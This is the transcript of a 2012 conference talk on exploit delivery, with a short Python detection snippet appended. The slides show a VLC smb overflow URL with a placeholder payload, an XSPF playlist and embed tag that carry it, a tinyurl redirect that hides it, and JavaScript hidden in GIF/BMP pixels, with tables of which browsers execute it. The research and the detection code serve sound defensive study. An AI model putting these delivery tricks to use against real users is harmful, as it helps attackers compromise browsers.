Innovative Exploit Delivery

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

Upload Details

Uploaded as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Comments

  • Yeah, but can you exploit it on latest Linux amd64 with all the new gcc patches, PIE, stack cookies, ASLR, heap protection, etc? No...

Innovative Exploit Delivery Presentation Transcript

  • 1. INNOVATIVE EXPLOIT DELIVERY
    Saumil Shah, net-square, HITB2012KUL
  • 2. # who am i
    Saumil Shah, CEO Net-Square.
    • Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.
    • M.S. Computer Science, Purdue University.
    • saumil@net-square.com
    • LinkedIn: saumilshah
    • Twitter: @therealsaumil
  • 3. My area of work: Penetration Testing, Reverse Engineering, Exploit Writing, New Attack Research, Offensive Security, Defense, Conference Speaker, "Eyes and ears open"
  • 4. When two forces combine... Web Hacking + Binary Exploits
  • 5. SNEAKY. LETHAL.
  • 6. (image only)
  • 7. 302, IMG, JS, HTML5
  • 8. (image only)
  • 9. VLC smb overflow
    • smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}
    • Classic Stack Overflow.
  • 10. VLC XSPF file
    <?xml version="1.0" encoding="UTF-8"?>
    <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
      <title>Playlist</title>
      <trackList>
        <track>
          <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
          <extension application="http://www.videolan.org/vlc/playlist/0">
            <vlc:id>0</vlc:id>
          </extension>
        </track>
      </trackList>
    </playlist>
  • 11. Alpha Encoded Tiny ZOMFG Exploit URL
  • 12. 100% Pure Alphanum!
  • 13. VLC smb overflow - HTMLized!!
    <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" />
  • 14. 301 Redirect from tinyurl
    HTTP/1.1 301 Moved Permanently
    X-Powered-By: PHP/5.2.12
    Location: smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?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}
    Content-type: text/html
    Content-Length: 0
    Connection: close
    Server: TinyURL/1.6
  • 15. (image only)
  • 16. Exploits as Images - 1
    • Grayscale encoding (0-255).
    • 1 pixel = 1 character.
    • Perfectly valid image.
    • Decode and Execute!
  • 17. (image only)
  • 18. I'm an evil Javascript / I'm an innocent image
  • 19. <CANVAS>
  • 20. c) no eval()
  • 21. Same Same No Different!
    var a = eval(str);
    a = (new Function(str))();
  • 22. d) IMAJS
  • 23. IMAJS: Seeing is Believing
  • 24. Browser Support for IMAJS-GIF
    Height  Width  Browser/Viewer   Image renders?  Javascript executes?
    2f 2a   00 00  Firefox          yes             yes
    2f 2a   00 00  Safari           yes             yes
    2f 2a   00 00  IE               no              yes
    2f 2a   00 00  Chrome           yes             yes
    2f 2a   00 00  Preview.app      yes             -
    2f 2a   00 00  XP Image Viewer  no              -
    2f 2a   00 00  Win 7 Preview    yes             -
  • 25. Browser Support for IMAJS-BMP
    Height  Width  Browser/Viewer   Image renders?  Javascript executes?
    2f 2a   00 00  Firefox          yes             yes
    2f 2a   00 00  Safari           yes             yes
    2f 2a   00 00  IE               yes             yes
    2f 2a   00 00  Chrome           yes             yes
    2f 2a   00 00  Opera            yes             yes
    2f 2a   00 00  Preview.app      yes             -
    2f 2a   00 00  XP Image Viewer  yes             -
    2f 2a   00 00  Win 7 Preview    yes             -
  • 26. e) The αq exploit
  • 27. Encode using Alpha channel
  • 28. Demo: IMAJS αq FTW!
  • 29. f) ONE LAST DEMO!!!
  • 30. The FUTURE? HTML5 Video, SVG, WebGL, Mobile Browsers
  • 31. KTHXBAI. See you in 2013?? saumil@net-square.com | @therealsaumil
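As an added defender-side check (not code from the talk or from net-square), the following Python snippet inspects the bytes that follow a GIF or BMP signature and flags headers like the "2f 2a 00 00" rows in the IMAJS tables, where the dimension bytes also read as the JavaScript comment opener "/*". The sample headers are constructed for the example, and the choice of the BMP file-size field as the field being checked is an assumption.

```python
import struct

# Constructed sample headers, not files from the talk. The first two reproduce the
# "2f 2a 00 00" bytes listed in the IMAJS tables; the third is an ordinary
# 320x200 GIF header for comparison.
IMAJS_STYLE_GIF = b"GIF89a" + b"\x2f\x2a\x00\x00" + b"\x80\x00\x00" + b"\x00" * 16
IMAJS_STYLE_BMP = b"BM" + b"\x2f\x2a\x00\x00" + b"\x00" * 20
ORDINARY_GIF = b"GIF89a" + struct.pack("<HH", 320, 200) + b"\x80\x00\x00" + b"\x00" * 16

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")


def header_fields(data: bytes):
    """Return (format, the four bytes right after the magic signature) or None.

    GIF: bytes 6-9 hold logical screen width and height (little-endian uint16 each).
    BMP: bytes 2-5 hold the file-size field (assumption: the BMP variant in the
    table reuses this field, as it directly follows the "BM" signature).
    """
    if data[:6] in GIF_SIGNATURES:
        return "gif", data[6:10]
    if data[:2] == b"BM":
        return "bmp", data[2:6]
    return None


def imajs_indicators(data: bytes) -> dict:
    """Flag image headers whose post-signature bytes double as a JS comment opener."""
    found = header_fields(data)
    if found is None:
        return {"format": None, "suspicious": False}
    fmt, raw = found
    opens_js_comment = raw.startswith(b"/*")
    # Script could only follow if the comment opened by the header is closed later.
    body_start = 10 if fmt == "gif" else 6
    result = {
        "format": fmt,
        "field_bytes": raw.hex(" "),
        "opens_js_comment": opens_js_comment,
        "closes_js_comment": b"*/" in data[body_start:],
        "suspicious": opens_js_comment,
    }
    if fmt == "gif":
        width, height = struct.unpack("<HH", raw)
        result["width"], result["height"] = width, height
        # A zero logical-screen height is a further sign the header was chosen
        # for its byte values rather than to describe an image.
        result["suspicious"] = result["suspicious"] or height == 0
    return result
```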